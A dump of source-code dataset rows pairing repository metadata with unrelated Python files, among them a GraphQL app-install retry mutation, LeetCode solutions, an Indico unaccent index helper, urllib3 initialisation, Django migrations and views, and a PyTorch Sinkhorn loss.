from ...core.mutations import ModelMutation
from ...core.types import AppError
from ...core.utils import WebhookEventInfo
from ..types import AppInstallation
class AppRetryInstall(ModelMutation):
class Arguments:
id = graphene.ID(description="ID of failed installation.", required=True)
activate_after_installation = graphene.Boolean(
default_value=True,
required=False,
description="Determine if app will be set active or not.",
)
class Meta:
description = "Retry failed installation of new app."
model = models.AppInstallation
object_type = AppInstallation
permissions = (AppPermission.MANAGE_APPS,)
error_type_class = AppError
error_type_field = "app_errors"
webhook_events_info = [
WebhookEventInfo(
type=WebhookEventAsyncType.APP_INSTALLED,
description="An app was installed.",
),
]
@classmethod
def save(cls, _info: ResolveInfo, instance, _cleaned_input, /):
instance.status = JobStatus.PENDING
instance.save()
@classmethod
def clean_instance(cls, _info: ResolveInfo, instance):
if instance.status != JobStatus.FAILED:
msg = "Cannot retry installation with different status than failed."
code = AppErrorCode.INVALID_STATUS.value
raise ValidationError({"id": ValidationError(msg, code=code)})
@classmethod
def perform_mutation(cls, _root, info: ResolveInfo, /, **data):
activate_after_installation = data.get("activate_after_installation")
app_installation = cls.get_instance(info, **data)
cls.clean_instance(info, app_installation)
cls.save(info, app_installation, None)
install_app_task.delay(app_installation.pk, activate_after_installation)
return cls.success_response(app_installation)
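# Example GraphQL call (sketch only; the camel-cased field and payload names
# are inferred from the mutation class above, not taken from the schema):
#   mutation {
#     appRetryInstall(id: "QXBwSW5zdGFsbGF0aW9uOjE=", activateAfterInstallation: true) {
#       appInstallation { id status }
#     }
#   }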
|
[
"[email protected]"
] | |
0573b6563ad45c09808049f4fdd2f87ff082fce9
|
ba157236151a65e3e1fde2db78b0c7db81b5d3f6
|
/String/longest_group_positions.py
|
f01ef3284224992f2d915fed2ff79a7296bfda75
|
[] |
no_license
|
JaberKhanjk/LeetCode
|
152488ccf385b449d2a97d20b33728483029f85b
|
78368ea4c8dd8efc92e3db775b249a2f8758dd55
|
refs/heads/master
| 2023-02-08T20:03:34.704602 | 2020-12-26T06:24:33 | 2020-12-26T06:24:33 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 372 |
py
|
class Solution(object):
    def largeGroupPositions(self, s):
        """
        :type s: str
        :rtype: List[List[int]]
        """
        ans = []
        i = 0
        for j in range(len(s)):
            # a group ends at index j when the next character differs
            # (or when j is the last index of s)
            if j == len(s) - 1 or s[j] != s[j+1]:
                if j - i + 1 >= 3:  # "large" means the group has >= 3 characters
                    ans.append([i, j])
                i = j + 1
        return ans
|
[
"[email protected]"
] | |
2a947f6dde626fc5c7a608db41b0b51fbd6eafdb
|
8d5ba6747531cbd43d63d32265fd608f9081c3b7
|
/.venv/lib/python2.7/site-packages/indico/core/db/sqlalchemy/custom/unaccent.py
|
b4838177828f13481121fa0984a94d46e9307b19
|
[] |
no_license
|
Collinsnyamao/indico
|
0e433b78803afae5b1ac90483db1f3d90ce2fddb
|
32adf8123e266eb81439b654abc993b98e0cd7f2
|
refs/heads/master
| 2020-03-18T04:55:40.386595 | 2018-06-02T13:45:47 | 2018-06-02T13:45:47 | 134,314,163 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,436 |
py
|
# This file is part of Indico.
# Copyright (C) 2002 - 2018 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from sqlalchemy import DDL, Index, text
from sqlalchemy.event import listens_for
from sqlalchemy.sql import func
from sqlalchemy.sql.elements import conv
from indico.util.string import to_unicode
# if you wonder why search_path is set and the two-argument `unaccent` function is used,
# see this post on stackoverflow: http://stackoverflow.com/a/11007216/298479
SQL_FUNCTION_UNACCENT = '''
CREATE FUNCTION indico.indico_unaccent(value TEXT)
RETURNS TEXT
AS $$
BEGIN
RETURN unaccent('unaccent', value);
END;
$$
LANGUAGE plpgsql IMMUTABLE SET search_path = public, pg_temp;
'''
def _should_create_function(ddl, target, connection, **kw):
sql = "SELECT COUNT(*) FROM information_schema.routines WHERE routine_name = 'indico_unaccent'"
count = connection.execute(text(sql)).scalar()
return not count
def create_unaccent_function(conn):
"""Creates the unaccent function if it doesn't exist yet.
In TESTING mode it always uses the no-op version to have a
consistent database setup.
"""
DDL(SQL_FUNCTION_UNACCENT).execute_if(callable_=_should_create_function).execute(conn)
def define_unaccented_lowercase_index(column):
"""Defines an index that uses the indico_unaccent function.
Since this is usually used for searching, the column's value is
also converted to lowercase before being unaccented. To make proper
use of this index, use this criterion when querying the table::
db.func.indico.indico_unaccent(db.func.lower(column)).ilike(...)
The index will use the trgm operators which allow very efficient LIKE
even when searching e.g. ``LIKE '%something%'``.
:param column: The column the index should be created on, e.g.
``User.first_name``
"""
@listens_for(column.table, 'after_create')
def _after_create(target, conn, **kw):
assert target is column.table
col_func = func.indico.indico_unaccent(func.lower(column))
index_kwargs = {'postgresql_using': 'gin',
'postgresql_ops': {col_func.key: 'gin_trgm_ops'}}
Index(conv('ix_{}_{}_unaccent'.format(column.table.name, column.name)), col_func, **index_kwargs).create(conn)
def unaccent_match(column, value, exact):
from indico.core.db import db
value = to_unicode(value).replace('%', r'\%').replace('_', r'\_').lower()
if not exact:
value = '%{}%'.format(value)
# we always use LIKE, even for an exact match. when using the pg_trgm indexes this is
# actually faster than `=`
return db.func.indico.indico_unaccent(db.func.lower(column)).ilike(db.func.indico.indico_unaccent(value))
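# Usage sketch (``User`` and ``first_name`` are hypothetical here; any model
# with a string column works the same way):
#   db.session.query(User).filter(
#       unaccent_match(User.first_name, u'Jose', exact=False))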
|
[
"[email protected]"
] | |
6371e03f7e86aed6d39e751ba81d7471c80155ef
|
7d2f933ed3c54e128ecaec3a771817c4260a8458
|
/venv/Lib/site-packages/requests/packages/urllib3/__init__.py
|
f669e1f517d93579a48a00c7ca81b40ac6d206c5
|
[] |
no_license
|
danielmoreira12/BAProject
|
c61dfb1d0521eb5a28eef9531a00e744bfb0e26a
|
859f588305d826a35cc8f7d64c432f54a0a2e031
|
refs/heads/master
| 2021-01-02T07:17:39.267278 | 2020-02-25T22:27:43 | 2020-02-25T22:27:43 | 239,541,177 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,700 |
py
|
# urllib3/__init__.py
# Copyright 2008-2013 Andrey Petrov and contributors (see CONTRIBUTORS.txt)
#
# This module is part of urllib3 and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
urllib3 - Thread-safe connection pooling and re-using.
"""
__author__ = 'Andrey Petrov ([email protected])'
__license__ = 'MIT'
__version__ = 'dev'
# Set default logging handler to avoid "No handler found" warnings.
import logging
from . import exceptions
from .connectionpool import (
HTTPConnectionPool,
HTTPSConnectionPool,
connection_from_url
)
from .filepost import encode_multipart_formdata
from .poolmanager import PoolManager, ProxyManager, proxy_from_url
from .response import HTTPResponse
from .util import make_headers, get_host, Timeout
try: # Python 2.7+
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
logging.getLogger(__name__).addHandler(NullHandler())
def add_stderr_logger(level=logging.DEBUG):
"""
Helper for quickly adding a StreamHandler to the logger. Useful for
debugging.
Returns the handler after adding it.
"""
# This method needs to be in this __init__.py to get the __name__ correct
# even if urllib3 is vendored within another package.
logger = logging.getLogger(__name__)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(message)s'))
logger.addHandler(handler)
logger.setLevel(level)
    logger.debug('Added a stderr logging handler to logger: %s' % __name__)
return handler
# ... Clean up.
del NullHandler
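# Usage sketch: enable verbose pool logging while debugging (the level argument
# is optional and defaults to DEBUG, as defined above):
#   import urllib3
#   handler = urllib3.add_stderr_logger()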
|
[
"[email protected]"
] | |
f48b6acd7862cead47ba1fafc6a3ebd6557b73be
|
303bac96502e5b1666c05afd6c2e85cf33f19d8c
|
/solutions/python3/993.py
|
d918d769447829914b6898f916ac2d314071b6a7
|
[
"MIT"
] |
permissive
|
jxhangithub/leetcode
|
5e82f4aeee1bf201e93e889e5c4ded2fcda90437
|
0de1af607557d95856f0e4c2a12a56c8c57d731d
|
refs/heads/master
| 2022-05-22T12:57:54.251281 | 2022-03-09T22:36:20 | 2022-03-09T22:36:20 | 370,508,127 | 1 | 0 |
MIT
| 2022-03-09T22:36:20 | 2021-05-24T23:16:10 | null |
UTF-8
|
Python
| false | false | 430 |
py
|
class Solution:
def isCousins(self, root: TreeNode, x: int, y: int) -> bool:
        def dfs(node, parent, depth, mod):
            # returns (depth, parent) of the node whose value equals `mod`,
            # or None if it is absent from this subtree
            if node:
                if node.val == mod:
                    return depth, parent
                return dfs(node.left, node, depth + 1, mod) or dfs(node.right, node, depth + 1, mod)
        # concatenating the two (depth, parent) tuples unpacks into four values
        dx, px, dy, py = dfs(root, None, 0, x) + dfs(root, None, 0, y)
        # cousins: equal depth, different parents
        return dx == dy and px != py
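# Example (LeetCode 993, example 2): in the tree [1,2,3,None,4,None,5] the
# nodes 5 and 4 sit at the same depth under different parents, so
# isCousins(root, 5, 4) returns True.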
|
[
"[email protected]"
] | |
869d4de40b4774adacf3db6705df1c3d7a5ab419
|
cb2411c5e770bcdd07b170c2bc07f5e0cc72fc86
|
/Greedy/55. Jump Game.py
|
6ad22c17c7c535c3c1f269e0caf4426d60a13b2f
|
[] |
no_license
|
roy355068/Algo
|
f79cf51662832e33664fc1d2479f79405d586e2e
|
14febbb5d8504438ef143678dedc89d4b61b07c9
|
refs/heads/master
| 2021-05-11T04:32:11.434762 | 2018-01-30T00:01:26 | 2018-01-30T00:01:26 | 117,941,600 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,905 |
py
|
# Given an array of non-negative integers, you are initially positioned at the first index of the array.
# Each element in the array represents your maximum jump length at that position.
# Determine if you are able to reach the last index.
# For example:
# A = [2,3,1,1,4], return true.
# A = [3,2,1,0,4], return false.
# Idea: keep a `reachable` variable tracking the farthest index any jump so far
# can reach. If i > reachable, index i cannot be reached by any previous jump,
# so we can stop early and return False; once `reachable` covers the last
# index, the last element is reachable and the answer is True.
class Solution(object):
def canJump(self, nums):
"""
:type nums: List[int]
:rtype: bool
"""
# O(N ^ 2) time, O(N) space complexity
if not nums or len(nums) == 1:
return True
# jump array is a dp array that used to check if the index is reachable
jump = [False for _ in xrange(len(nums))]
jump[0] = True
for i in xrange(len(nums)):
step = nums[i]
j = i + 1
# jump[i] == True means that this index is reachable based
# on the jump steps before it
if jump[i] == True:
# update all indices that is reachable from current stand point
while j <= len(nums) - 1 and j < i + step + 1:
jump[j] = True
j += 1
return jump[-1]
        # Optimized alternative, O(N) time, O(1) space complexity
        # (unreachable as written -- drop the `return jump[-1]` above to use it)
i, reachable = 0, 0
# if i exceeds reachable, meaning that current index is never going
# to be reachable by jumping from previous indices
# hence stop the loop earlier
while i < len(nums) and i <= reachable:
reachable = max(reachable, i + nums[i])
i += 1
return i == len(nums)
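# Quick check with the examples from the header comment (assumes Python 2 to
# match the xrange usage above):
if __name__ == '__main__':
    assert Solution().canJump([2, 3, 1, 1, 4])
    assert not Solution().canJump([3, 2, 1, 0, 4])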
|
[
"[email protected]"
] | |
add36c49f08156fa9f65d5e079441f0e3c7f56f7
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03168/s086851558.py
|
7143c7be26364089fb75fade50516b0a34c2696e
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 511 |
py
|
import sys
def input(): return sys.stdin.readline().rstrip()
def main():
n=int(input())
P=list(map(float,input().split()))
    dp = [[0]*(n+1) for _ in range(n)]  # dp[i][j]: probability that j of coins 0..i land heads
dp[0][0]=1-P[0]
dp[0][1]=P[0]
for i in range(1,n):
for j in range(i+2):
if j==0:
dp[i][j]=dp[i-1][j]*(1-P[i])
else:
dp[i][j]=dp[i-1][j-1]*P[i]+dp[i-1][j]*(1-P[i])
print(sum(dp[-1][n//2+1:]))
if __name__=='__main__':
main()
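# Sample check (this path is AtCoder EDPC "I - Coins"): for n=3 and
# P=[0.30, 0.60, 0.80], the printed probability of strictly more heads
# than tails is 0.612.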
|
[
"[email protected]"
] | |
7d442a07bfb8f720507da67a316b7bfbddefbabe
|
e29b450bf924b983023db41a0cdea97cde129880
|
/reversible/sinkhorn.py
|
da994a5c781f3dbf5244c34a45a3d33e8ec14a12
|
[] |
no_license
|
afcarl/generative-reversible
|
b9efedad155d9c08f0f299f0b861ff6ff53607cf
|
e21b0846c654e0e041562f715bc5ddd90dde0e07
|
refs/heads/master
| 2020-03-21T03:29:34.655671 | 2018-05-26T18:53:54 | 2018-05-26T18:53:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,783 |
py
|
import numpy as np  # used by transport_mat_sinkhorn_below_entropy below
import torch as th
from reversible.gaussian import get_gauss_samples
from reversible.util import log_sum_exp, ensure_on_same_device, var_to_np
def sinkhorn_to_gauss_dist(outs, mean, std, **kwargs):
gauss_samples = get_gauss_samples(len(outs), mean, std)
return sinkhorn_sample_loss(outs, gauss_samples, **kwargs)
def M(u, v, C, epsilon):
    r"""Modified cost for logarithmic updates:
    $M_{ij} = (-c_{ij} + u_i + v_j) / \epsilon$
    """
    return (-C + u.unsqueeze(1) + v.unsqueeze(0)) / epsilon
def sinkhorn_sample_loss(samples_a, samples_b, epsilon=0.01, stop_threshold=0.1,
max_iters=50, normalize_cost_matrix=False, max_normed_entropy=None,
normalize_by_empirical_std_a=False):
assert normalize_cost_matrix in [False, 'mean', 'max']
diffs = samples_a.unsqueeze(1) - samples_b.unsqueeze(0)
if normalize_by_empirical_std_a:
stds = th.std(samples_a.detach(), dim=0, keepdim=True)
stds = th.clamp(stds, min=1e-5)
diffs = diffs / stds
C = th.sum(diffs * diffs, dim=2)
del diffs
C_nograd = C.detach()
if normalize_cost_matrix == 'mean':
C_nograd = C_nograd / th.mean(C_nograd)
elif normalize_cost_matrix == 'max':
C_nograd = C_nograd / th.max(C_nograd)
if max_normed_entropy is None:
estimated_trans_th = estimate_transport_matrix_sinkhorn(
C_nograd, epsilon=epsilon, stop_threshold=stop_threshold,
max_iters=max_iters)
else:
estimated_trans_th, _ = transport_mat_sinkhorn_below_entropy(
C_nograd, start_eps=epsilon, stop_threshold=stop_threshold,
max_iters_sinkhorn=max_iters, max_iters_for_entropy=10,
max_normed_entropy=max_normed_entropy)
cost = th.sqrt(th.sum(estimated_trans_th * C)) # Sinkhorn cost
return cost
def transport_mat_sinkhorn_below_entropy(
C, start_eps, max_normed_entropy, max_iters_for_entropy,
max_iters_sinkhorn=50, stop_threshold=1e-3):
normed_entropy = max_normed_entropy + 1
iteration = 0
cur_eps = start_eps
while (normed_entropy > max_normed_entropy) and (iteration < max_iters_for_entropy):
transport_mat = estimate_transport_matrix_sinkhorn(
C, epsilon=cur_eps, stop_threshold=stop_threshold, max_iters=max_iters_sinkhorn)
relevant_mat = transport_mat[transport_mat > 0]
normed_entropy = -th.sum(relevant_mat * th.log(relevant_mat)) / np.log(transport_mat.numel() * 1.)
normed_entropy = var_to_np(normed_entropy)
iteration += 1
cur_eps = cur_eps / 2
return transport_mat, cur_eps
def estimate_transport_matrix_sinkhorn(C, epsilon=0.01, stop_threshold=0.1,
max_iters=50):
n1 = C.size()[0]
n2 = C.size()[1]
mu = th.autograd.Variable(1. / n1 * th.FloatTensor(n1).fill_(1),
requires_grad=False)
nu = th.autograd.Variable(1. / n2 * th.FloatTensor(n2).fill_(1),
requires_grad=False)
mu, nu, C = ensure_on_same_device(mu, nu, C)
u, v, err = 0. * mu, 0. * nu, 0.
actual_nits = 0 # to check if algorithm terminates because of threshold or max iterations reached
for i in range(max_iters):
u1 = u # useful to check the update
u = epsilon * (
th.log(mu) - log_sum_exp(M(u, v, C, epsilon), dim=1, keepdim=True).squeeze()) + u
v = epsilon * (
th.log(nu) - log_sum_exp(M(u, v, C, epsilon).t(), dim=1, keepdim=True).squeeze()) + v
err = (u - u1).abs().sum()
actual_nits += 1
if var_to_np(err < stop_threshold).all():
break
estimated_transport_matrix = th.exp(M(u, v, C, epsilon))
return estimated_transport_matrix
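# Minimal usage sketch (shapes are assumptions; both sample sets live in R^d):
#   a = th.autograd.Variable(th.randn(128, 2))
#   b = th.autograd.Variable(th.randn(128, 2))
#   loss = sinkhorn_sample_loss(a, b, epsilon=0.01)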
|
[
"[email protected]"
] | |
89f7995781d60bb6ec3ed228079f873bf72f7ce1
|
f47df27f960b3c5abebf16145026d20fc81f062b
|
/dheeranet/views/home.py
|
9d2568894366f760bc5e482240240503dcf65e9a
|
[] |
no_license
|
dheera/web-dheeranet
|
34eec0591872d01afd441ce97a4853c95fde18a8
|
1faceb4d54d91ae1b7ee3f7e449ee3f224600b08
|
refs/heads/master
| 2021-01-22T06:32:12.403454 | 2017-04-10T20:55:33 | 2017-04-10T20:55:33 | 20,196,792 | 5 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 487 |
py
|
from flask import Blueprint, render_template, abort, request
from jinja2 import TemplateNotFound
from dheeranet import static_bucket
from dheeranet.cache import s3_get_cached
import json, datetime
home = Blueprint('home', __name__,template_folder='../template')
@home.route('/')
def show():
home_items = json.loads(s3_get_cached(static_bucket, '__home__'))
news_items = filter(lambda x:x['type']=='news', home_items)
return render_template('home.html', news_items = news_items)
|
[
"[email protected]"
] | |
c2ad9a49e4e23ffa98d960a2818b4175b1dece93
|
b5029b5710f72010690c5e57fe5c045dcff2701c
|
/books_authors_app/migrations/0001_initial.py
|
9f233b82732ee72e3c171a7a7c24c182c0d25b6d
|
[] |
no_license
|
Jallnutt1/first_django_project
|
2d059ed815227cf5c72af67e4e4074e95edf1508
|
200b98623292e806a407badf1cb9311e25bd561d
|
refs/heads/main
| 2023-04-04T00:50:19.183891 | 2021-04-13T18:56:03 | 2021-04-13T18:56:03 | 357,659,099 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,166 |
py
|
# Generated by Django 2.2 on 2021-04-09 00:55
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Author',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=255)),
('last_name', models.CharField(max_length=255)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Books',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
('desc', models.TextField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
|
[
"{ID}+{username}@users.noreply.github.com"
] |
{ID}+{username}@users.noreply.github.com
|
d0fa78d37064bf03251c9c6edf18a378195106d5
|
6196bd8f9226042b4c8e171313e273d1875c3ee4
|
/up_down_chain/up_down_chain/app/Subseribe/migrations/0002_bidsusersetting_mid.py
|
d2f23630662918aa99b11057208f625ad32ce97c
|
[] |
no_license
|
wang18722/Up_down_chain
|
87230f057dadea95ab8b2760ca756afe00675b26
|
3c18d5d5727db1562438edea66ef15f54b378e33
|
refs/heads/master
| 2022-12-27T09:04:49.976753 | 2019-07-01T01:19:12 | 2019-07-01T01:19:12 | 225,579,284 | 0 | 0 | null | 2022-12-08T01:23:21 | 2019-12-03T09:22:22 |
Python
|
UTF-8
|
Python
| false | false | 694 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2019-06-24 05:29
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('Subseribe', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='bidsusersetting',
name='mid',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='用户'),
),
]
|
[
"[email protected]"
] | |
2ab9c6aae658796991d04ae8393361738813a7fb
|
b6233af6a39e7ab500743d6b2ac7d52f68ae3be2
|
/15/00/2.py
|
b738c43f76091d7e37910b5e9ab030f6c459d903
|
[
"CC0-1.0"
] |
permissive
|
pylangstudy/201712
|
9754526e1d8f1c0519fcce98bc7df803f456cc4e
|
f18f1251074729c4a3865b113edc89ec06b54130
|
refs/heads/master
| 2021-09-02T06:08:08.278115 | 2017-12-30T23:04:55 | 2017-12-30T23:04:55 | 112,670,974 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 149 |
py
|
import socket, array
def send_fds(sock, msg, fds):
return sock.sendmsg([msg], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", fds))])
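# Usage sketch (mirrors the example in the socket.sendmsg docs; `sock` must be
# a connected AF_UNIX socket and `fd` an open file descriptor):
#   send_fds(sock, b'hello', [fd])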
|
[
"[email protected]"
] | |
2245d137d3c96c0d0184ca4ce3a2b2930945227a
|
e0980f704a573894350e285f66f4cf390837238e
|
/.history/news/models_20201124125236.py
|
70a66f359a9f8e8b4fff11e3efb6146fd18c69f7
|
[] |
no_license
|
rucpata/WagtailWebsite
|
28008474ec779d12ef43bceb61827168274a8b61
|
5aa44f51592f49c9a708fc5515ad877c6a29dfd9
|
refs/heads/main
| 2023-02-09T15:30:02.133415 | 2021-01-05T14:55:45 | 2021-01-05T14:55:45 | 303,961,094 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 160 |
py
|
from django.db import models
from wagtail.contrib.forms.models import AbstractEmailForm
# Create your models here.
class NewsPage(AbstractEmailForm):
    pass  # the original file is truncated at this point
|
[
"[email protected]"
] | |
d85e0b393ae8d8ee90e85e1f7704da446a52d993
|
5e9eba022385185a2c84d60fffe6cdf04421ed1b
|
/academicos/views.py
|
e44f4be6e8ae947cd6a615b5209a4e6d14064e29
|
[] |
no_license
|
lizceth/proyecto-eventos
|
4a6de50ee7ae7705fb7a81cb4fdbdbe2c9ed9516
|
b408149a463d130da72bb555237814cc5bb2dbfa
|
refs/heads/master
| 2020-06-02T18:21:08.415503 | 2014-10-14T22:35:26 | 2014-10-14T22:35:26 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,361 |
py
|
from django.contrib.auth.models import User
from django.shortcuts import render, render_to_response, get_object_or_404
from academicos.models import Coordinador, Escuela, Facultad
from django.http import HttpResponse, HttpResponseRedirect
from django.template import RequestContext
from asistentes.models import Persona
from asistentes.forms import *
#from django.core.mail import EmailMessage
#from django.contrib.auth.forms import UserCreationForm, AuthenticationForm
#from django.contrib.auth import login, authenticate, logout
#from django.contrib.auth.decorators import login_required
from academicos.forms import CoordinadorForm, EscuelaForm, FacultadForm
def Cordinadores(request):
cordinadores = Coordinador.objects.all()
titulo = "Lista de Cordinadores"
return render_to_response('academicos/cordinadoresList.html',{
'cordinadores':cordinadores,'titulo':titulo},
context_instance=RequestContext(request))
def Cordinador_add(request):
if request.method == "POST":
formulario = CoordinadorForm(request.POST)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect('/cordinadoresList/')
else:
formulario = CoordinadorForm()
return render_to_response('academicos/cordinadoresAdd.html',
{'formulario': formulario},
context_instance = RequestContext(request))
def Cordinador_edit (request, id):
cordinador_edit= Coordinador.objects.get(pk=id)
if request.method == 'POST':
formulario = CoordinadorForm(
request.POST, instance = cordinador_edit)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect("/cordinadoresList/")
else:
formulario = CoordinadorForm(instance= cordinador_edit)
return render_to_response('academicos/cordinadoresEdit.html',
{'formulario': formulario},
context_instance = RequestContext(request))
def Cordinador_borrar (request, id):
cordinador_borrar = get_object_or_404(Coordinador, pk=id)
cordinador_borrar.delete()
return HttpResponseRedirect("/cordinadoresList/")
def Escuelas(request):
escuelas = Escuela.objects.all()
titulo = "Lista de Escuelas"
return render_to_response('academicos/escuelasList.html',
{'escuelas':escuelas,'titulo':titulo},
context_instance=RequestContext(request))
def Escuela_add (request):
if request.method == "POST":
formulario = EscuelaForm(request.POST)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect('/escuelaList/')
else:
formulario = EscuelaForm()
return render_to_response('academicos/escuelasAdd.html',
{'formulario':formulario},
context_instance=RequestContext(request))
def Escuela_edit (request, id):
escuela_edit= Escuela.objects.get(pk=id)
if request.method == 'POST':
formulario = EscuelaForm(
request.POST, instance = escuela_edit)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect("/escuelaList/")
else:
formulario = EscuelaForm(instance= escuela_edit)
return render_to_response('academicos/escuelasEdit.html',
{'formulario': formulario},
context_instance = RequestContext(request))
def Escuelas_borrar (request, id):
escuelas_borrar = get_object_or_404(Escuela, pk=id)
escuelas_borrar.delete()
return HttpResponseRedirect("/escuelaList/")
def Facultades(request):
facultades = Facultad.objects.all()
titulo = "Lista de Facultades"
return render_to_response('academicos/facultadList.html',{
'facultades':facultades,'titulo':titulo},
context_instance=RequestContext(request))
def Facultad_add(request):
if request.method == "POST":
formulario = FacultadForm(request.POST)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect('/facultadesList/')
else:
formulario = FacultadForm()
return render_to_response('academicos/facultadAdd.html',
{'formulario': formulario},
context_instance = RequestContext(request))
def Facultad_edit (request, id):
facultad_edit= Facultad.objects.get(pk=id)
if request.method == 'POST':
formulario = FacultadForm(
request.POST, instance = facultad_edit)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect("/facultadesList/")
else:
formulario = FacultadForm(instance= facultad_edit)
return render_to_response('academicos/facultadEdit.html',
{'formulario': formulario},
context_instance = RequestContext(request))
def Facultad_borrar (request, id):
facultad_borrar = get_object_or_404(Facultad, pk=id)
facultad_borrar.delete()
return HttpResponseRedirect("/facultadesList/")
|
[
"[email protected]"
] | |
c5d9cf121b69761030d0050d73f56d251f3b3b8d
|
a57eb85856cc93a389b815276765a06019d6f8d4
|
/manage.py
|
a187e1a5e09bc71ad51ec80483e4c11d9cced0d9
|
[
"MIT"
] |
permissive
|
astrofrog/multistatus
|
205f6ad9a06995bc4b418f6d0de222c4dacfcb79
|
f63042c9e85cb4e58e3768a65f4684be07e432d1
|
refs/heads/master
| 2021-01-10T21:05:40.370555 | 2014-12-09T10:24:48 | 2014-12-09T10:24:48 | 22,805,918 | 0 | 1 | null | 2014-12-09T10:23:13 | 2014-08-10T09:39:38 |
Python
|
UTF-8
|
Python
| false | false | 257 |
py
|
#!/usr/bin/env python3.4
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "multistatus.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[
"[email protected]"
] | |
10d541866288a328b07bc1a9602e1afcbb87583f
|
994461efa08e71403b2a1c0598391fddf3b44b87
|
/june-leetcoding-challenge/d5-random-pick-with-weight.py
|
65d47a61d6766e106ff6b66178910de5a81e3489
|
[] |
no_license
|
pkdism/leetcode
|
26f16f9211ddfdef8e0fe74c9268e6a48da64717
|
589652ae727331d1f962d22a020fc6ae09bfcea4
|
refs/heads/master
| 2020-12-11T15:48:01.116731 | 2020-08-16T18:31:03 | 2020-08-16T18:31:03 | 233,889,125 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 947 |
py
|
"""
Given an array w of positive integers,
where w[i] describes the weight of index i,
write a function pickIndex which randomly picks an index in proportion to its weight.
"""
import random
from typing import List  # needed for the List[int] annotation below
class Solution:
def __init__(self, w: List[int]):
self.w = w
self.n = len(self.w)
self.arr = []
self.curr = 0
for x in w:
self.curr += x
self.arr.append(self.curr)
def pickIndex(self) -> int:
# print(self.arr)
n = len(self.arr)
r = random.randrange(1, self.arr[-1] + 1)
l = 0
h = n-1
while l < h:
m = (l+h)//2
# if self.arr[m] == r:
# return m
if self.arr[m] < r:
l = m + 1
else:
h = m
return l
# Your Solution object will be instantiated and called as such:
# obj = Solution(w)
# param_1 = obj.pickIndex()
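# e.g. for w = [1, 3] the prefix sums are arr = [1, 4], so pickIndex() returns
# index 0 with probability 1/4 and index 1 with probability 3/4.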
|
[
"[email protected]"
] | |
488eedf2868298347e8fd761a86a7501687b5a22
|
cc6e8b20a64940f2ad83be6a03134e8b105514e7
|
/webviz/viz/migrations/0001_initial.py
|
71fcb033e7e32232e310b0dfc022cfe73f08c521
|
[
"MIT"
] |
permissive
|
JagritiG/django-webviz
|
50654c4fe76b1653f64e404c45d674d5d179e236
|
213489bb3a70019ca9cff5d127fd6d0c06bc61d6
|
refs/heads/main
| 2023-04-27T01:21:04.195996 | 2021-05-16T22:30:04 | 2021-05-16T22:30:04 | 353,126,658 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 552 |
py
|
# Generated by Django 3.1.7 on 2021-03-30 18:58
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Csv',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('csv', models.FileField(upload_to='media/csvs/')),
],
),
]
|
[
"[email protected]"
] | |
f197241de30622889b167ecb7dc068406820dbc8
|
